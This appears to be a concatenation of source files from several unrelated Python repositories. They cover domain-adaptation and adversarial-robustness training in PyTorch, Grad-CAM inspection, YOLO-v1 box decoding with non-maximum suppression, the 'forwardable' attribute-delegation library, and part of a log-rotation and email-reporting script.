length = 0
# pbar = tqdm(self.testtargetloader, ncols=100, desc=self.args.target)
for images, labels in self.testtargetloader:
images, labels = images.to(self.device), labels.to(self.device)
batch_size = len(images)
result = self.model(images, mode='source')
pred = result[3].argmax(1)
# pred = result[3].argmax(1, keepdim=True)
correct += pred.eq(labels).sum().item()
length += batch_size
accuracy = correct *100//length
return accuracy
```
#### File: 87transfer/module/model.py
```python
import torch
import torch.nn as nn
from torch.autograd import Function
class DaNN(nn.Module):
def __init__(self):
super(DaNN, self).__init__()
self.main_features = nn.Sequential(
nn.Conv2d(3, 64, 6, stride=2),
# nn.BatchNorm2d(64),
# nn.MaxPool2d(2),
nn.ReLU(True),
nn.Conv2d(64, 50, 6, stride=2),
# nn.BatchNorm2d(50),
# nn.Dropout2d(),
# nn.MaxPool2d(2),
nn.ReLU(True),
)
self.classifier = nn.Sequential(
nn.Linear(50*4*4, 100),
# nn.BatchNorm1d(100),
nn.ReLU(True),
# nn.Dropout(),
nn.Linear(100,100),
# nn.BatchNorm1d(100),
nn.ReLU(True),
nn.Linear(100, 10),
# nn.LogSoftmax(dim=1),
)
self.domain = nn.Sequential(
nn.Linear(50*4*4, 100),
nn.BatchNorm1d(100),
nn.ReLU(True),
nn.Linear(100,2),
# nn.LogSoftmax(dim=1)
)
self.reverse = ReverseLayerF
self.alpha = 0
def forward(self, images, mode='class'):
# images = images.expand(images.shape[0], 3, 28, 28) ### for usps 1 --> 3
features = self.main_features(images)
features = features.view(-1, 50*4*4)
reverse_feature = self.reverse.apply(features, self.alpha)
if mode == 'class':
output = self.classifier(features)
else:
output = self.domain(reverse_feature)
return output
def _set_alpha(self, alpha):
self.alpha = alpha
def one_seq_chunk(self):
return nn.Sequential(*(list(self.main_features.children()) + [Flatten()] + list(self.classifier.children())))
def update_chunk(self, chunk):
self.main_features.load_state_dict(chunk[:3].state_dict())
chunk_classifier = torch.nn.Sequential(* list(chunk[5:].children()))
self.classifier.load_state_dict(chunk_classifier.state_dict())
class Flatten(nn.Module):
def __init__(self):
super(Flatten, self).__init__()
def forward(self, input):
return input.view(input.size(0), -1)
class ReverseLayerF(Function):
@staticmethod
def forward(ctx, x, alpha):
ctx.alpha = alpha
return x.view_as(x)
@staticmethod
def backward(ctx, grad_output):
output = grad_output.neg() * ctx.alpha
return output, None
if __name__ == '__main__':
import torch
model = DaNN()
print(model)
sample = torch.randn(128, 3, 28, 28)
print('sample shape', sample.shape)
a, b = model(sample, 0)
print(a.shape)
print(b.shape)
```
#### File: 87transfer/module/trainer2.py
```python
from module.model import DaNN
from module.datafunc import make_dataloaders
import torch
from tqdm import tqdm
import numpy as np
import os
from convex_adversarial import robust_loss, robust_loss_parallel
torch.manual_seed(7)
torch.cuda.manual_seed_all(100)
torch.backends.cudnn.deterministic = True
class Trainer():
def __init__(self, args):
self.model = DaNN()
self.optimizer = torch.optim.Adam(self.model.parameters())
self.criterion = torch.nn.CrossEntropyLoss()
self.criterion_domain = torch.nn.CrossEntropyLoss()
dataloaders = make_dataloaders(args.source, args.target, args.batch_size)
self.sourceloader = dataloaders[0]
self.sourcetestloader = dataloaders[1]
self.targetloader = dataloaders[2]
self.targettestloader = dataloaders[3]
self.device = 'cuda' if torch.cuda.is_available() else 'cpu'
for to_cuda_obj in [self.model, self.criterion, self.criterion_domain]:
to_cuda_obj.to(self.device)
self.cert = args.cert
self.args = args
stot = (self.args.source[:1], self.args.target[:1])
self.modelpath = os.path.join('ckpt', self.args.taskname, 'model_%s_%s.pth'%stot)
self.certpath = os.path.join('ckpt', self.args.taskname, 'cert_%s_%s.pth'%stot)
def train(self):
print('%s --> %s'%(self.args.source, self.args.target))
print('half')
best_acc = 0
# bbar = range(self.args.epochs)
if self.args.resume is None:
bbar = tqdm(range(self.args.epochs), ncols=100)
for epoch in bbar:
self.model.train()
self.train_one_epoch(epoch)
self.model.eval()
sacc, acc = self.test()
if acc > best_acc:
best_acc = acc
if self.cert:
torch.save(self.model.state_dict(), self.certpath)
else:
torch.save(self.model.state_dict(), self.modelpath)
# print(sacc, acc, best_acc)
bbar.set_postfix(acc=acc, sacc=sacc, best_acc=best_acc)
modelpath = self.certpath if self.cert else self.modelpath
self.model.load_state_dict(torch.load(modelpath))
result = self.attack()
print('source fgsm pgd')
print(result[0][0])
print(result[0][1])
print('target fgsm pgd')
print(result[1][0])
print(result[1][1])
def train_one_epoch(self, epoch):
num_iteration = min(len(self.sourceloader), len(self.targetloader))
pbar = tqdm(range(num_iteration), ncols=100, desc=str(epoch))
for i in pbar:
p = float(i + epoch * num_iteration) / self.args.epochs / num_iteration
alpha = 2. / (1. + np.exp(-10 * p)) - 1
simg, slabel = next(iter(self.sourceloader))
simg, slabel = simg.to(self.device), slabel.to(self.device)
timg, __ = next(iter(self.targetloader))
timg = timg.to(self.device)
## simply split the model into two???
#train with source data
batch_size = len(slabel)
domain_label = torch.zeros(batch_size).long().to(self.device)
self.model._set_alpha = alpha
if self.cert:
features = self.model.main_features(simg)
features = features.view(-1, 50*4*4)
loss_label, err = robust_loss(self.model.classifier, 0.05, features, slabel)
else:
output = self.model(simg)
loss_label = self.criterion(output, slabel)
domain_output = self.model(simg, mode='domain')
loss_domain = self.criterion_domain(domain_output, domain_label)
# train with target data
batch_size = len(timg)
domain_label = torch.ones(batch_size).long().to(self.device)
domain_output = self.model(timg, mode='domain')
tloss_domain = self.criterion_domain(domain_output, domain_label)
loss = loss_label + loss_domain + tloss_domain
self.optimizer.zero_grad()
loss.backward()
self.optimizer.step()
pbar.set_postfix(loss=loss_label.item(), d_s_loss=loss_domain.item(), d_t_loss=tloss_domain.item())
def test(self): #source and test
alpha = 0
result = []
for loader in [self.sourcetestloader, self.targettestloader]:
correct = 0
length = 0
for images, labels in loader:
images, labels = images.to(self.device), labels.to(self.device)
batch_size = len(images)
output = self.model(images)
pred = output.argmax(dim=1)
correct += pred.eq(labels).sum().item()
length += batch_size
accuracy = correct *100//length
result.append(accuracy)
return result
def attack(self):
RES = []
for loader in [self.sourcetestloader, self.targettestloader]:
results = []
for desc, attack_f in zip(['FGSM', 'PGD'], [self.FGSM, self.PGD]):
result = []
for eps in tqdm([i*0.01 for i in range(10)], ncols=100, desc=desc):
accuracy = 0
length = 0
for images, target in loader:
images, target = images.cuda(), target.cuda()
pert_image = attack_f(eps, images, target)
output = self.model(pert_image)
pred = output.argmax(dim=1)
accuracy += pred.eq(target).data.sum()
length += len(pred)
result.append(accuracy.item()*100//length)
results.append(result)
print(result)
RES.append(results)
return RES
def FGSM(self, eps, images, target):
## this is
X = images.clone()
X.requires_grad = True
output = self.model(X)
loss = self.criterion(output, target)
loss.backward()
grad_sign = X.grad.data.sign()
return (X + eps*grad_sign).clamp(0, 1)
def PGD(self, eps, images, target):
X_orig = images.clone()
X_var = images.clone()
for __ in range(40):
X = X_var.clone()
X.requires_grad = True
output = self.model(X)
loss = self.criterion(output, target)
loss.backward()
grad_sign = X.grad.data.sign()
X_var = X_var + 0.05*grad_sign
# X_var.clamp(X_orig-eps, X_orig+eps)
X_var = torch.where(X_var < X_orig-eps, X_orig-eps, X_var)
X_var = torch.where(X_var > X_orig+eps, X_orig+eps, X_var)
X_var.clamp(0, 1)
return X_var
```
#### File: Attention/module/datafunc.py
```python
from torch.utils import data
from torchvision import datasets
from torchvision import transforms
#main function to be called
def make_dataloader(data_dir_root, datatype, img_size, batch_size):
if datatype=='mnist':
dataset = MNIST(data_dir_root, img_size, True)
train_loader = data.DataLoader(dataset, batch_size=batch_size, shuffle=True)
dataset = MNIST(data_dir_root, img_size, False)
test_loader = data.DataLoader(dataset, batch_size=batch_size, shuffle=True)
elif datatype=='cifar10':
dataset = CIFAR10(data_dir_root, img_size, True)
train_loader = data.DataLoader(dataset, batch_size=batch_size, shuffle=True)
dataset = CIFAR10(data_dir_root, img_size, False)
test_loader = data.DataLoader(dataset, batch_size=batch_size, shuffle=True)
return train_loader, test_loader
#list of datasets to use
def MNIST(data_dir_root, img_size, train):
trans = transforms.Compose([
transforms.Resize(img_size),
transforms.ToTensor(),
# transforms.Normalize(mean=(0.5,0.5,0.5), std=(0.5,0.5,0.5))
])
dataset = datasets.MNIST(
data_dir_root, train=train, download=True, transform=trans
)
return dataset
def CIFAR10(data_dir_root, img_size, train):
trans = transforms.Compose([
transforms.Resize(img_size),
transforms.ToTensor(),
transforms.Normalize(mean=(0.5,0.5,0.5), std=(0.5,0.5,0.5))
])
dataset = datasets.CIFAR10(
data_dir_root, train=train, download=True, transform=trans
)
return dataset
```
#### File: Attention/module/trainer.py
```python
from module.model import LeNet5
from module.datafunc import make_dataloader, MNIST
from module.utils import check_directories
from grad_cam import GradCAM, BackPropagation
import torch
from torch import optim
import torch.nn as nn
from torch.autograd import Variable
from torchvision.utils import save_image
from torchvision import transforms
from tqdm import tqdm
import numpy as np
import cv2
import glob
class Trainer():
def __init__(self, config, args, opt):
self.model = LeNet5(args)
self.optimizer = optim.Adam(self.model.parameters(), lr=args.lr, betas=args.betas)
self.criterion = nn.CrossEntropyLoss()
self.config = config
self.args = args
self.opt = opt
self.device = 'cuda' if torch.cuda.is_available() else 'cpu'
if self.device =='cuda':
self.model.cuda()
def main_inspection(self):
# images = [cv2.imread(file) for file in glob.glob(self.opt.task_dir+'/adsamples/*.png')]
# for raw_image in images:
# # raw_image = cv2.imread(self.opt.task_dir+'/adsamples')
# # raw_image = cv2.imread(image_path)[..., ::-1]
# image = transforms.Compose(
# [
# transforms.ToTensor(),
# # transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]),
# ]
# )(raw_image).unsqueeze(0)
# image = image.to(self.device)
# self.inspect_one(image)
for i,img in enumerate(self.origsamples):
self.inspect_one(img, 'o'+str(i))
for i,img in enumerate(self.adsamples):
# save_image(img, 'myresults/test.png')
self.inspect_one(img, 'a'+str(i))
def inspect_one(self, image, name):
def save_gradcam(filename, gcam, raw_image):
# print(raw_image.shape)
h, w, __= raw_image.shape
gcam = cv2.resize(gcam, (w, h))
gcam = cv2.applyColorMap(np.uint8(gcam * 255.0), cv2.COLORMAP_JET)
gcam = gcam.astype(np.float)/100 + raw_image.astype(np.float)
gcam = gcam / gcam.max() * 255.0
cv2.imwrite(filename, np.uint8(gcam))
# print("Grad-CAM")
bp = BackPropagation(model=self.model)
predictions = bp.forward(image)
print(predictions)
bp.remove_hook()
gcam = GradCAM(model=self.model)
_ = gcam.forward(image)
classes = list(range(10))
# print(self.model)
for i in range(1):
# print("[{:.5f}] {}".format(predictions[i][0], classes[predictions[i][1]]))
# Grad-CAM
gcam.backward(idx=predictions[i][1])
region = gcam.generate(target_layer='conv')
img = image.squeeze().detach().cpu().numpy()
rgbimg = cv2.cvtColor(img,cv2.COLOR_GRAY2RGB)
save_gradcam(
"myresults/{}-{}-{}.png".format(
name, 'conv', classes[predictions[i][1]]
),
region,
rgbimg,
)
def load(self):
self.model.load(self.opt.model_filepath)
def adversary(self):
print('adversary for task:', self.config.taskname)
adsample_path = self.opt.task_dir+'/adsamples'
check_directories([adsample_path])
self.adsamples = []
self.origsamples = []
test_set = MNIST(self.config.data_dir_root, self.args.img_size, False)
epsilon = 0.3
count = 1
list_ = []
for i in range(len(test_set)):
image, target = test_set[i]
image = image.to(self.device)
image = image.unsqueeze(0)
target = torch.LongTensor([target]).to(self.device)
output = self.model(image)
if not output.argmax(dim=1).eq(target):
continue
elif target in list_:
continue
self.origsamples.append(image)
list_.append(target)
image.requires_grad = True
output = self.model(image)
loss = self.criterion(output, target)
self.model.zero_grad()
loss.backward()
gradient = image.grad.data
adimg = self.FGSM(image, epsilon, gradient)
self.adsamples.append(adimg)
pred = self.model(adimg).argmax(dim=1).item()
save_image(adimg.cpu(), adsample_path+'/sample%d_%d-%d.png'%(count, target.item(), pred))
count+=1
if count > 10:
break
def FGSM(self,img, eps, grad):
adimg = img + eps*grad.sign()
adimg = torch.clamp(adimg, 0, 1)
return adimg
def train(self):
print('training for task:', self.config.taskname)
train_loader, test_loader = make_dataloader( self.config.data_dir_root,
self.config.datatype,
self.args.img_size,
self.args.batch_size)
print('train %d #'%self.opt.epochs, 'save at %s'%self.opt.task_dir)
for i in range(self.opt.epochs):
self.train_one_epoch(train_loader)
self.test(test_loader)
self.model.save(self.opt.model_filepath)
def train_one_epoch(self, train_loader):
pbar = tqdm(train_loader)
for inputs, targets in pbar:
inputs = inputs.to(self.device)
targets = targets.to(self.device)
output = self.model(inputs)
loss = self.criterion(output, targets)
self.model.zero_grad()
loss.backward()
self.optimizer.step()
pred = output.argmax(dim=1, keepdim=True)
accuracy = pred.eq(targets.view_as(pred)).sum().item()
accuracy = accuracy/len(targets) * 100
message = 'loss: %.4f, accuracy: %.2f %%'%(loss.item(), accuracy)
pbar.set_description(message)
def test(self, test_loader):
pbar = tqdm(test_loader)
accuracy = 0
total = 0
for inputs, targets in pbar:
inputs = inputs.to(self.device)
targets = targets.to(self.device)
output = self.model(inputs)
pred = output.argmax(dim=1, keepdim=True)
accuracy += pred.eq(targets.view_as(pred)).sum().item()
total += len(pred)
accuracy = accuracy/total * 100
message = 'test accuracy: %d'%accuracy
print(message)
```
#### File: module/model_package/mwdnet.py
```python
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.nn.parameter import Parameter
from torch.autograd.function import Function
from model_package.loss_bound import BoundedParameter
class MWDNet(nn.Module):
def __init__(self, args, init_channel):
super(MWDNet, self).__init__()
self.layers = nn.ModuleList()
in_channel = init_channel
for i, channel_size in enumerate(args.layer_sizes):
l = unit(in_channel, channel_size,
andor=args.andor[i])
self.layers.append(l)
in_channel = channel_size
def forward(self, x):
x = x.flatten(1)
for l in self.layers:
x = l(x)
return x
def interval_forward(self, x_min, x_max):
x_min, x_max = x_min.flatten(1), x_max.flatten(1)
for l in self.layers:
x_min, x_max = l.interval_forward(x_min, x_max)
return x_min, x_max
def sensitivity(self):
s = None
for l in self.layers:
s = l.sensitivity(s)
return torch.max(s)
# can this work?
def save(self, filepath):
state = {
'net': self.layers.state_dict(),
}
torch.save(state, filepath)
def load(self, filepath):
state = torch.load(filepath)
self.layers.load_state_dict(state['net'])
class LargeAttractorExp(Function):
"""Implements e^-x with soft derivative."""
@staticmethod
def forward(ctx, x):
ctx.save_for_backward(x)
return torch.exp(-x)
@staticmethod
def backward(ctx, grad_output):
x = ctx.saved_tensors[0]
return - grad_output / torch.sqrt(1. + x)
class SharedFeedbackMax(Function):
@staticmethod
def forward(ctx, x):
y, _ = torch.max(x, -1)
ctx.save_for_backward(x, y)
return y
@staticmethod
def backward(ctx, grad_output):
x, y = ctx.saved_tensors
y_complete = y.view(list(y.shape) + [1])
d_complete = grad_output.view(list(grad_output.shape) + [1])
return d_complete * torch.exp(x - y_complete)
class unit(nn.Module):
def __init__(self, in_features, out_features, andor="*",
min_input=0.0, max_input=0.0, min_slope=0.001, max_slope=10.0):
super(unit, self).__init__()
self.in_features = in_features
self.out_features = out_features
self.andor = andor
self.modinf = True #modinf
self.regular_deriv = False
self.w = BoundedParameter(torch.Tensor(out_features, in_features),
lower_bound=min_input, upper_bound=max_input)
self.u = BoundedParameter(torch.Tensor(out_features, in_features),
lower_bound=min_slope, upper_bound=max_slope)
if andor == 'v':
self.andor01 = Parameter(torch.ones((1, out_features)))
elif andor == '^':
self.andor01 = Parameter(torch.zeros((1, out_features)))
else:
self.andor01 = Parameter(torch.Tensor(1, out_features))
self.andor01.data.random_(0, 2)
self.andor01.requires_grad = False
self.w.data.uniform_(min_input, max_input)
# Initialization of u.
self.u.data.uniform_(0.2, 0.7) # These could be parameters.
self.u.data.clamp_(min_slope, max_slope)
def forward(self, x):
# Let n be the input size, and m the output size.
# The tensor x is of shape * n. To make room for the output,
# we view it as of shape * 1 n.
# Aggregates into a modulus.
xx = x.unsqueeze(-2)
xuw = self.u * (xx - self.w)
xuwsq = xuw * xuw
if self.modinf:
# We want to get the largest square, which is the min one as we changed signs.
if self.regular_deriv:
z, _ = torch.max(xuwsq, -1)
y = torch.exp(- z)
else:
z = SharedFeedbackMax.apply(xuwsq)
y = LargeAttractorExp.apply(z)
else:
z = torch.sum(xuwsq, -1)
if self.regular_deriv:
y = torch.exp(- z)
else:
y = LargeAttractorExp.apply(z)
# Takes into account and-orness.
if self.andor == '^':
return y
elif self.andor == 'v':
return 1.0 - y
else:
return y + self.andor01 * (1.0 - 2.0 * y)
def interval_forward(self, x_min, x_max):
xx_min = x_min.unsqueeze(-2)
xx_max = x_max.unsqueeze(-2)
xuw1 = self.u * (xx_min - self.w)
xuwsq1 = xuw1 * xuw1
xuw2 = self.u * (xx_max - self.w)
xuwsq2 = xuw2 * xuw2
sq_max = torch.max(xuwsq1, xuwsq2)
sq_min = torch.min(xuwsq1, xuwsq2)
# If w is between x_min and x_max, then sq_min should be 0.
# So we multiply sq_min by something that is 0 if x_min < w < x_max.
sq_min = sq_min * ((xx_min > self.w) + (self.w > xx_max)).float()
y_min = torch.exp(- torch.max(sq_max, -1)[0])
y_max = torch.exp(- torch.max(sq_min, -1)[0])
# Takes into account and-orness.
if self.andor == '^':
return y_min, y_max
elif self.andor == 'v':
return 1.0 - y_max, 1.0 - y_min
else:
y1 = y_min + self.andor01 * (1.0 - 2.0 * y_min)
y2 = y_max + self.andor01 * (1.0 - 2.0 * y_max)
y_min = torch.min(y1, y2)
y_max = torch.max(y1, y2)
return y_min, y_max
def overall_sensitivity(self):
"""Returns the sensitivity to adversarial examples of the layer."""
if self.modinf:
s = torch.max(torch.max(self.u, -1)[0], -1)[0].item()
else:
s = torch.max(torch.sqrt(torch.sum(self.u * self.u, -1)))[0].item()
s *= np.sqrt(2. / np.e)
return s
def sensitivity(self, previous_layer):
"""Given the sensitivity of the previous layer (a vector of length equal
to the number of inputs), it computes the sensitivity to adversarial examples
of the current layer, as a vector of length equal to the output size of the
layer. If the input sensitivity of the previous layer is None, then unit
sensitivity is assumed."""
if previous_layer is None:
previous_layer = self.w.new(1, self.in_features)
previous_layer.fill_(1.)
else:
previous_layer = previous_layer.view(1, self.in_features)
u_prod = previous_layer * self.u
if self.modinf:
# s = torch.max(u_prod, -1)[0]
s = SharedFeedbackMax.apply(u_prod)
else:
s = torch.sqrt(torch.sum(u_prod * u_prod, -1))
s = s * np.sqrt(2. / np.e)
return s
def dumps(self):
"""Writes itself to a string."""
# Creates a dictionary
d = dict(
in_features=self.in_features,
out_features=self.out_features,
min_input=self.w.lower_bound,
max_input=self.w.upper_bound,
min_slope=self.u.lower_bound,
max_slope=self.u.upper_bound,
modinf=self.modinf,
regular_deriv=self.regular_deriv,
andor=self.andor,
andor01=self.andor01.cpu().numpy(),
u=self.u.data.cpu().numpy(),
w=self.w.data.cpu().numpy(),
)
return Serializable.dumps(d)
```
#### File: 00template/convex_adversarial/dual.py
```python
import torch.nn as nn
from abc import ABCMeta, abstractmethod
class DualObject(nn.Module, metaclass=ABCMeta):
def __init__(self):
""" Initialize a dual layer by initializing the variables needed to
compute this layer's contribution to the upper and lower bounds.
In the paper, if this object is at layer i, this is initializing `h'
with the required cached values when nu[i]=I and nu[i]=-I.
"""
super(DualObject, self).__init__()
@abstractmethod
def apply(self, dual_layer):
""" Advance cached variables initialized in this class by the given
dual layer. """
raise NotImplementedError
@abstractmethod
def bounds(self):
""" Return this layers contribution to the upper and lower bounds. In
the paper, this is the `h' upper bound where nu is implicitly given by
c=I and c=-I. """
raise NotImplementedError
@abstractmethod
def objective(self, *nus):
""" Return this layers contribution to the objective, given some
backwards pass. In the paper, this is the `h' upper bound evaluated on a
the given nu variables.
If this is layer i, then we get as input nu[k] through nu[i].
So non-residual layers will only need nu[-1] and nu[-2]. """
raise NotImplementedError
class DualLayer(DualObject):
@abstractmethod
def forward(self, *xs):
""" Given previous inputs, apply the affine layer (forward pass) """
raise NotImplementedError
@abstractmethod
def T(self, *xs):
""" Given previous inputs, apply the transposed affine layer
(backward pass) """
raise NotImplementedError
``` |
{
"source": "5loaves-2fish-12basckets/YOLO-v1",
"score": 2
} |
#### File: YOLO-v1/module/predfunc.py
```python
import torch
# def _decoder(pred):
# for i in range(7):
# for j in range(7):
# cell = pred[i][j]
def encoder(boxes, labels): ## length is ratio
target = torch.zeros((7,7,26))
cell_size = 1./7
width_height = boxes[:,2:] - boxes[:,:2]
center_x_ys = (boxes[:,2:]+ boxes[:,:2])/2
for it, center_x_y in enumerate(center_x_ys):
cell_i_j = (center_x_y/cell_size).ceil() - 1
i = int(cell_i_j[1])
j = int(cell_i_j[0])
target[i, j, 4] = 1
target[i, j, 9] = 1
target[i, j, int(labels[it]+9)] = 1
tl_x_y = cell_i_j * cell_size
delta_x_y = (center_x_y - tl_x_y) / cell_size
target[i, j, 2:4] = width_height[it]
target[i, j, :2] = delta_x_y
target[i, j, 7:9] = width_height[it]
target[i, j, 5:7] = delta_x_y
return target
def _decoder(pred, thresh=0.01):
boxes=[]
cls_indexs=[]
probs = []
cell_size = 448/7
img_size = 448.
pred = pred.data
pred = pred.squeeze(0) #7x7x26
contain1 = pred[:,:,4].unsqueeze(2) # 7,7,1
contain2 = pred[:,:,9].unsqueeze(2)
contain = torch.cat((contain1,contain2),2) # 7,7,2
mask1 = contain > 0.1 #大于阈值
mask2 = (contain==contain.max()) #we always select the best contain_prob what ever it>0.9
mask = (mask1+mask2).gt(0)
# min_score,min_index = torch.min(contain,2) #每个cell只选最大概率的那个预测框
for i in range(7):
for j in range(7):
for b in range(2):
# index = min_index[i,j]
# mask[i,j,index] = 0
if mask[i,j,b] == 1:
#print(i,j,b)
box = pred[i,j,b*5:b*5+4]
# box is cx cy w h in (cell ratio; img ratio)
contain_prob = torch.FloatTensor([pred[i,j,b*5+4]])
xy = torch.FloatTensor([j,i])*cell_size #cell左上角 up left of cell (in pixel)
box[:2] = box[:2]*cell_size + xy # return cxcy relative to image (in pixel)
box[2:] = box[2:]*img_size
box_xy = torch.FloatTensor(box.size())#转换成xy形式 convert[cx,cy,w,h] to [x1,y1,x2,y2]
box_xy[:2] = box[:2] - 0.5*box[2:]
box_xy[2:] = box[:2] + 0.5*box[2:]
large = torch.ones(box_xy.shape) * 512
small = torch.zeros(box_xy.shape)
box_xy = torch.where(box_xy>512, large, box_xy)
box_xy = torch.where(box_xy<0, small, box_xy)
max_prob,cls_index = torch.max(pred[i,j,10:],0)
if float((contain_prob*max_prob)[0]) > thresh:
boxes.append(box_xy.view(1,4))
cls_indexs.append(cls_index.unsqueeze(0))
probs.append(contain_prob*max_prob)
if len(boxes) ==0:
boxes = torch.zeros((1,4))
probs = torch.zeros(1)
cls_indexs = torch.zeros(1)
else:
boxes = torch.cat(boxes,0) #(n,4)
probs = torch.cat(probs,0) #(n,)
cls_indexs = torch.cat(cls_indexs,0) #(n,)
keep = nms(boxes,probs)
return boxes[keep],cls_indexs[keep],probs[keep]
def nms(bboxes,scores,threshold=0.5):
'''
bboxes(tensor) [N,4]
scores(tensor) [N,]
'''
x1 = bboxes[:,0]
y1 = bboxes[:,1]
x2 = bboxes[:,2]
y2 = bboxes[:,3]
areas = (x2-x1) * (y2-y1)
_,order = scores.sort(0,descending=True)
keep = []
while order.numel() > 0:
if order.shape == torch.Size([]):
i = order.item()
else:
i = order[0]
keep.append(i)
if order.numel() == 1:
break
xx1 = x1[order[1:]].clamp(min=x1[i])
yy1 = y1[order[1:]].clamp(min=y1[i])
xx2 = x2[order[1:]].clamp(max=x2[i])
yy2 = y2[order[1:]].clamp(max=y2[i])
w = (xx2-xx1).clamp(min=0)
h = (yy2-yy1).clamp(min=0)
inter = w*h
ovr = inter / (areas[i] + areas[order[1:]] - inter)
ids = (ovr<=threshold).nonzero().squeeze()
if ids.numel() == 0:
break
order = order[ids+1]
return torch.LongTensor(keep)
classnames = [
'plane', 'ship', 'storage-tank', 'baseball-diamond',
'tennis-court', 'basketball-court', 'ground-track-field',
'harbor', 'bridge', 'small-vehicle', 'large-vehicle',
'helicopter', 'roundabout', 'soccer-ball-field',
'swimming-pool', 'container-crane']
def reader(label_path):
boxes = []
labels = []
with open(label_path, 'r') as f:
lines = f.readlines()
for line in lines:
obj_ = line.strip().split()
xmin = float(obj_[0])
ymin = float(obj_[1])
xmax = float(obj_[4])
ymax = float(obj_[5])
obj_class = classnames.index(obj_[8]) + 1
boxes.append([xmin, ymin, xmax, ymax])
labels.append(obj_class) ### +1???
return boxes, labels
'''
from module.prediction import encoder, reader, _decoder
from module.augment import data_augmentation, processimg
import cv2
import torch
from PIL import Image
img = cv2.imread('hw2_train_val/train15000/images/00000.jpg')
label_path = 'hw2_train_val/train15000/labelTxt_hbb/00000.txt'
boxes, labels = reader(label_path)
boxes = torch.Tensor(boxes)
labels = torch.Tensor(labels)
img, boxes, labels = data_augmentation(img, boxes, labels)
h, w, __ = img.shape
boxes /= torch.Tensor([w, h, w, h]).expand_as(boxes)
img = processimg(img)
target = encoder(boxes, labels)
boxes,cls_indexs,probs = _decoder(target)
'''
``` |
{
"source": "5long/forwardable",
"score": 3
} |
#### File: forwardable/forwardable/__init__.py
```python
__version__ = '0.4.1'
__all__ = ["forwardable", "def_delegator", "def_delegators"]
try:
basestring
except NameError:
basestring = (str, bytes)
import sys
from operator import attrgetter
class NotCalledInModuleScope(Exception): pass
class NotCalledInClassScope(Exception): pass
class WrongDecoratorSyntax(Exception): pass
def def_delegator(wrapped, attr_name, doc_from_class=None, _call_stack_depth=1):
"""
Define a property ``attr_name`` in the current class scope which
forwards accessing of ``self.<attr_name>`` to property
``self.<wrapped>.<attr_name>``.
Must be called in a class scope.
"""
frame = sys._getframe(_call_stack_depth)
if not looks_like_class_frame(frame):
raise NotCalledInClassScope
get_wrapped_obj = attrgetter(wrapped)
def getter(self):
return getattr(get_wrapped_obj(self), attr_name)
def setter(self, value):
return setattr(get_wrapped_obj(self), attr_name, value)
def deleter(self):
return delattr(get_wrapped_obj(self), attr_name)
doc = doc_from_class.__dict__[attr_name].__doc__ if doc_from_class else None
scope = frame.f_locals
scope[attr_name] = property(getter, setter, deleter, doc)
def def_delegators(wrapped, attrs, doc_from_class=None):
"""
Define multiple delegations for a single delegatee. Roughly equivalent
to def_delegator() in a for-loop.
The ``attrs`` argument can be an iterable of attribute names, or
a comma-and-spaces separated string of attribute names. The following
form works identically:
def_delegators(wrapped, ('foo', 'bar')) # Tuple of attribute names
def_delegators(wrapped, 'foo bar') # Separated by space
def_delegators(wrapped, 'foo, bar') # With optional comma
Must be called in a class scope.
"""
attrs = split_attrs(attrs) if isinstance(attrs, basestring) else attrs
for a in attrs:
def_delegator(wrapped, a, doc_from_class=doc_from_class, _call_stack_depth=2)
CLS_SCOPE_KEYS = ("__module__",)
def looks_like_class_frame(frame):
return all(k in frame.f_locals for k in CLS_SCOPE_KEYS)
def is_module_frame(frame):
return frame.f_globals is frame.f_locals
def split_attrs(attrs):
return attrs.replace(',', ' ').split()
def inject(frame):
if not is_module_frame(frame):
raise NotCalledInModuleScope()
frame.f_locals.update(
def_delegator=def_delegator,
def_delegators=def_delegators)
def cleanup(scope):
scope.pop("def_delegator")
scope.pop("def_delegators")
def forwardable():
"""
A class decorator which makes def_delegator() and def_delegators()
available in the class scope.
This decorator must be used in the form of `@forwardable()`, instead of
`@forwardable`. And it must be called in a module scope (which should be
the case for most common class definitions).
"""
frame = sys._getframe(1)
inject(frame)
def decorate(cls):
cleanup(frame.f_locals)
return cls
return decorate
``` |
{
"source": "5lunk/psec",
"score": 2
} |
#### File: 5lunk/psec/service_funcs.py
```python
import re
import sys
import os
import subprocess
import time
import json
import logging
import smtplib
import datetime
import glob
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
from email.mime.application import MIMEApplication
def log_rotation(config):
"""
Log rotation
"""
if os.path.exists(config['log_dir'] + 'logs/') == False:
os.mkdir(config['log_dir'] + 'logs/')
if os.path.exists(config['log_dir'] + 'log_archive/') == False:
os.mkdir(config['log_dir'] + 'log_archive/')
if len(glob.glob1(config['log_dir'] + 'log_archive/', '*.txt')) >= 50:
tar = 'tar czf ' + config['log_dir'] + 'log_archive/log_archive_' + \
datetime.datetime.today().strftime('%Y-%m-%d') + \
'.tar.gz ' + config['log_dir'] + 'log_archive/*.txt'
subprocess.Popen(tar, shell=True, stderr=subprocess.DEVNULL)
for log in glob.glob(config['log_dir'] + 'log_archive/*.txt'):
os.remove(log)
def send_report(email, config):
"""
Sends logs of current requests
Executed if the <REPORT> key is present in the message text
"""
files_list = os.listdir(config['log_dir'] + 'logs/')
# There are open requests
if len(files_list) >= 1:
msg = MIMEMultipart()
msg['Subject'] = 'Logs of current requests in an attachment'
send = smtplib.SMTP(config['mail_server'])
for f in files_list:
file_path = os.path.join(config['log_dir'] + 'logs/', f)
attachment = MIMEApplication(open(file_path, 'rb').read(), _subtype='txt')
attachment.add_header('Content-Disposition', 'attachment', filename=f)
msg.attach(attachment)
msg.attach(MIMEText('Logs of current requests in an attachment'))
send.sendmail(config['mail_from'], [email], msg.as_string())
send.quit()
# No open requests
else:
msg = MIMEMultipart()
msg['Subject'] = 'There are currently no requests being processed'
send = smtplib.SMTP(config['mail_server'])
send.sendmail(config['mail_from'], [email], msg.as_string())
send.quit()
def send_start(log_file_name, mac, config):
"""
Sends a message about the opening of the ticket, indicating the MAC address of the device and the ticket tracker
"""
msg = MIMEMultipart()
msg['Subject'] = mac + ' request accepted'
send = smtplib.SMTP(config['mail_server'])
msg.attach(MIMEText(mac + ' request accepted, TRACKER: ' + log_file_name))
send.sendmail(config['mail_from'], [config['mailbox']], msg.as_string())
send.quit()
def send_end(log_file_name, mac, task_result, config):
"""
Sends a message about the closing of the request with an indication of its status and a log of its execution
"""
msg = MIMEMultipart()
msg['Subject'] = task_result + ' ' + mac
send = smtplib.SMTP(config['mail_server'])
